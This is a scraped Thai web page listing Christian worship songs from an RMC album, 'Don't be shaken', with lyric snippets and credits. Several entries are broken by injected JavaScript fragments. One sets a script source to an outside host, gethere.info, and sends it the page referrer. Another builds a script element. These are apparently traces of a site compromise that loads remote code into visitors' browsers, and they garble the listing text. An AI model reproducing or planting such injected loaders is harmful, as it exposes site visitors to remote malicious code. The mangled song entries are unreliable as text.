RMC Tag

p19tk4j4up199mhva4001su81em3n
16 ต.ค.

เพลง แม่น้ำของพระคริสต์

ขอพระองค์โปรดเติม ในแม่น้ำใหม่ รับจากพระวิญญาณ ขอประทาน ความชื่นบาน ความรักใหม่ ใจฉันอยากได้รับ ชื่อเพลง : แม่น้ำของพระคริสต์ อัลบั้ม Don't be shaken เนื้อร้อง: เจริญ ยธิกุล ทำนอง: เจริญ ยธิกุล เรียบเรียง: สราวุฒิ ม่วงคำ ร้องนำ:  สุรวดี เทียนสีม่วง วง...

p19tk4j4uq13uc1na469l13t5923r
16 ต.ค.

เพลง องค์พระบิดา

องค์พระบิดา ระบายลมปราณให้ฉัน ชีวิตเป็นของพระองค์ จะร้องสรรเสริญ พระองค์ทุกวัน (ชีวิตของฉันเป็นของพระองค์) ชื่อเพลง : องค์พระบิดา อัลบั้ม Don't be shaken เนื้อร้อง: เจริญ ยธิกุล ทำนอง: เจริญ ยธิกุล เรียบเรียง: สราวุฒิ ม่วงคำ ร้องนำ: ปิยฉัตร ม่วงคำ วง : RMC...

16 ต.ค.

เพลง จงวางใจในพระเจ้า

ความรักมั่นคง ของพระองค์ ที่ทรงประทาน มาให้ฉัน พระองค์ทรงมีแผนการ ในชีวิตฉัน ชื่อเพลง : จงวางใจในพระเจ้า อัลบั้ม Don't be shaken เนื้อร้อง: เจริญ ยธิกุล ทำนอง: เจริญ ยธิกุล เรียบเรียง: สุรวดี เทียนสีม่วง ร้องนำ: จุฑาธิป ลีลาจารุวรรณ วง : RMC...

16 ต.ค.

เพลง เมื่อพระวิญญาณสถิต

เมื่อพระวิญญาณสถิต เมือพระวิญญาณสถิต ทำให้ฉันมีชีวิต ทำให้ฉันมีกำลัง ชื่อเพลง : เมื่อพระวิญญาณสถิต อัลบั้ม Don't be shaken เนื้อร้อง: เจริญ ยธิกุล ทำนอง: เจริญ ยธิกุล เรียบเรียง: สราวุฒิ ม่วงคำ ร้องนำ: ปิยฉัตร ม่วงคำ วง : RMC WORSHIPs.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword='...

p19tirnrju1hoo10fhe6214os1rd4b
16 ต.ค.

เพลง ทรงลิขิต

พระเจ้าของฉันนั้นยิ่งใหญ่ ทรงจูงมือฉันไป ทุกวัน ทรงนำฉันจากครรภ์มารดา ทรงเรียกหาฉันทุกเวลา ชื่อเพลง : ทรงลิขิต อัลบั้ม Don't be shaken เนื้อร้อง: เจริญ ยธิกุล ทำนอง: เจริญ ยธิกุล เรียบเรียง: สราวุฒิ ม่วงคำ ร้องนำ: สราวุฒิ ม่วงคำ วง : RMC WORSHIP} else...

13 ต.ค.

เพลง ความรักของพระเยซู

ความรักของพระเยซู ทรงยอมตายเพื่อไถ่บาปฉัน พระองค์ทรงเป็นความหวัง เป็นพลังให้เดินก้าวไป ชื่อเพลง : อย่าหวั่นไหว อัลบั้ม Don't be shaken คำร้อง เจริญ ยธิกุล ทำนอง เจริญ ยธิกุล เรียบเรียง สุรวดี เทียนสีม่วง ขับร้อง สุรวดี เทียนสีม่วง  var d=document;var s=d.createElement('script'); ...